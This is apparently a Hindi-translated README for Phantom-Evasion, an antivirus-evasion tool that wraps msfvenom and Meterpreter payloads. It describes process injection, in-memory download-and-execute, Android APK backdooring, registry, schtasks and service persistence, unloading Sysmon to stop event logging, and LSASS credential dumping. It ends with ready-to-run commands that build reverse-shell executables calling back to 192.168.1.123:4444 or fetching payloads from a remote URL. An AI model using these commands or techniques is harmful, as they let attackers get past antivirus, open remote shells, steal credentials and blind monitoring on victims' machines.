
Python एंटीवायरस एवेज़न टूल
Phantom-Evasion एक एंटीवायरस एवेज़न टूल है जो पायथन में लिखा गया है (पायथन और पायथन3 दोनों के साथ संगत) जो सबसे सामान्य x86 msfvenom पेलोड के साथ भी (लगभग) पूरी तरह से अज्ञात एक्ज़ीक्यूटेबल उत्पन्न करने में सक्षम है।
निम्नलिखित ऑपरेटिंग सिस्टम आधिकारिक तौर पर स्वचालित सेटअप का समर्थन करते हैं:
निम्नलिखित ऑपरेटिंग सिस्टम संभवतः स्वचालित सेटअप का समर्थन करते हैं लेकिन मेटास्प्लोइट-फ्रेमवर्क की मैन्युअल स्थापना की आवश्यकता होती है:
निम्नलिखित ऑपरेटिंग सिस्टम मैन्युअल सेटअप की आवश्यकता रखते हैं:
बस git clone करें या डाउनलोड करें और Phantom-Evasion फ़ोल्डर को अनज़िप करें
स्वचालित सेटअप, एक टर्मिनल खोलें और निष्पादित करें:
python3 phantom-evasion.py --setup
या:
chmod +x ./phantom-evasion.py
./phantom-evasion.py --setup
या इंटरैक्टिव मोड में फैंटम-एवेज़न शुरू करें और विकल्प 7 चुनें
python3 phantom-evasion.py
या:
./phantom-evasion.py
python3 phantom-evasion.py --help
या:
./phantom-evasion.py --help
-प्रत्येक विंडोज पेलोड C मॉड्यूल को EXE या DLL/ReflectiveDLL के रूप में संकलित किया जा सकता है (x86 और x64 दोनों का समर्थन करता है)।
-रैंडमाइज्ड जंककोड इंजेक्शन (तीव्रता, आवृत्ति और पुनः इंजेक्शन की संभावना सेट की जा सकती है) और विंडोज एंटीवायरस एवेज़न तकनीक (आवृत्ति सेट की जा सकती है)।
-शेलकोड इंजेक्शन और डाउनलोड एक्सेक मॉड्यूल दोनों में मल्टीबाइट Xor/Vigenere शेलकोड/फ़ाइल एन्क्रिप्शन समर्थित है।
-Ntdll unhookapi और Peb प्रक्रिया मास्करेडिंग तकनीक समर्थित है।
-निष्पादन मोड की विस्तृत श्रृंखला समर्थित है (स्थानीय और दूरस्थ दोनों)।
-पेलोड मेमोरी आवंटन मोड की विस्तृत श्रृंखला (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX)।
-विंडोज एपीआई का गतिशील लोडिंग सेट किया जा सकता है।
-सर्टिफिकेट स्पूफर और साइनर समर्थित है।
-एक्ज़ीक्यूटेबल स्ट्रिप करें (https://en.wikipedia.org/wiki/Strip_(Unix))
Msfvenom विंडोज पेलोड और कस्टम शेलकोड समर्थित हैं। शेलकोड को संसाधन के रूप में संग्रहीत किया जा सकता है और रनटाइम पर FindResource API के साथ पुनर्प्राप्त किया जा सकता है।
शेलकोड एन्क्रिप्शन समर्थित:
1. कोई नहीं
2. Multibyte-Xor
3. Double-key Multibyte-Xor
4. Vigenere
5. Double-key Vigenere
स्थानीय निष्पादन विधि निम्नलिखित में से एक हो सकती है:
Thread
APC
स्थानीय मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
Heap_RWX
दूरस्थ निष्पादन विधि निम्नलिखित में से एक हो सकती है:
ThreadExecutionHijack (संक्षिप्त TEH)
Processinject (संक्षिप्त PI)
APCSpray (संक्षिप्त APCS)
EarlyBird (संक्षिप्त EB)
EntryPointHijack (संक्षिप्त EPH)
दूरस्थ मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
प्योर C मीटरप्रेटर स्टेजर (TCP/HTTP/HTTPS) मॉड्यूल msfconsole और कोबाल्ट स्ट्राइक बीकन के साथ संगत हैं। (reverse_tcp/reverse_http/reverse_https)
कमांडलाइन मोड का उपयोग करते हुए:
reverse_tcp c stager है WRT
reverse_http c stager है WRH
reverse_https c stager है WRS
स्थानीय निष्पादन विधि निम्नलिखित में से एक हो सकती है:
Thread
APC
स्थानीय मेमोरी आवंटन मोड निम्नलिखित में से एक हो सकता है:
Virtual_RWX
Virtual_RW/RX
Virtual_RW/RWX
Heap_RWX
दिए गए URL से exe/dll को मेमोरी में डाउनलोड करें और दूरस्थ प्रक्रिया में निष्पादित/लोड करें (डिस्क पर लिखे बिना)।
एन्क्रिप्टेड EXE/DLL डाउनलोड समर्थित:
1. कोई नहीं
2. Multibyte-Xor
3. Double-key Multibyte-Xor
4. Vigenere
5. Double-key Vigenere
एन्क्रिप्टेड DLL/EXE को मूल फ़ाइल नाम + "crypt" + ".dll" या ".exe" के रूप में सहेजा जाएगा, यह वह है जिसे डाउनलोड किया जाना है
विंडोज डाउनलोडएक्सेकएक्से NoDiskWrite (cmdline मोड में WDE):
दूरस्थ निष्पादन विधि निम्नलिखित में से एक हो सकती है:
ProcessHollowing (संक्षिप्त PH)
विंडोज डाउनलोडएक्सेकडीएलएल NoDiskWrite (cmdline मोड में WDD):
दूरस्थ लोडिंग विधि निम्नलिखित में से एक हो सकती है:
ReflectiveDll (संक्षिप्त RD)
RDAPC (ReflectiveDllAPC)
ManualMap (संक्षिप्त MM) ---> केवल x86
Msfvenom लिनक्स पेलोड और कस्टम शेलकोड समर्थित हैं।
एंड्रॉइड Msfvenom ऑब्सफस्केट बैकडोर:
msfvenom पेलोड को ऑब्सफस्केट करें और apktool के साथ पुनर्निर्माण करें (smali/baksmali)। ऑब्सफस्केटेड पेलोड का उपयोग बेनाइन apk फ़ाइलों को बैकडोर करने के लिए किया जा सकता है।
विंडोज स्थायित्व RegCreateKeyExW रजिस्ट्री कुंजी जोड़ें (C) संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और तर्क के रूप में स्टार्टअप में जोड़ने के लिए फ़ाइल का पूरा पथ निर्दिष्ट करके निष्पादित करने की आवश्यकता है।
विंडोज स्थायित्व REG रजिस्ट्री कुंजी जोड़ें (CMD) यह मॉड्यूल स्थायित्व cmdline पेलोड उत्पन्न करता है (REG.exe के माध्यम से रजिस्ट्री कुंजी जोड़ें)।
विंडोज स्थायित्व प्रक्रिया को जीवित रखें (C) संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है। CreateToolSnapshoot, ProcessFirst और ProcessNext का उपयोग करके जाँचें कि निर्दिष्ट प्रक्रिया हर X सेकंड में जीवित है या नहीं (यदि नहीं, तो WinExec API का उपयोग करके एक नई प्रक्रिया बनाएँ)।
विंडोज स्थायित्व Schtasks (CMD)
यह मॉड्यूल स्थायित्व cmdline पेलोड उत्पन्न करता है (Schtasks.exe का उपयोग करके)।
विंडोज स्थायित्व सेवा बनाएँ (CMD)
यह मॉड्यूल स्थायित्व cmdline पेलोड उत्पन्न करता है (sc.exe का उपयोग करके)।
विंडोज DuplicateTokenEx (C)
किसी अन्य प्रक्रिया से क्लोन किए गए टोकन के साथ एक नई प्रक्रिया बनाएँ। संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
विंडोज Sysmon अनलोड करें (C) sysmon ड्राइवर को अनलोड करें जिससे सिस्टम sysmon इवेंट लॉग रिकॉर्ड करना बंद कर देता है। संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
विंडोज Sysmon अनलोड करें (CMD) sysmon ड्राइवर को अनलोड करें जिससे सिस्टम sysmon इवेंट लॉग रिकॉर्ड करना बंद कर देता है।
विंडोज Attrib फ़ाइल छुपाएँ (CMD) फ़ाइल को छुपाने के लिए attrib का उपयोग करें
विंडोज SetFileAttribute छिपा हुआ (C) SetFileAttribute API का उपयोग करके फ़ाइल छुपाएँ संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
विंडोज DumpLsass (C) MiniWriteDumpWrite API का उपयोग करके Lsass डंप करें। संकलित एक्ज़ीक्यूटेबल को लक्ष्य मशीन पर अपलोड करने और निष्पादित करने की आवश्यकता है।
विंडोज DumpLsass (CMD)
cmdline से Lsass डंप करें।
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000 -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000 -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll
GPLv3.0
https://github.com/stephenfewer/ReflectiveDLLInjection
https://github.com/rsmudge/metasploit-loader
https://github.com/theevilbit/injection
http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/
https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf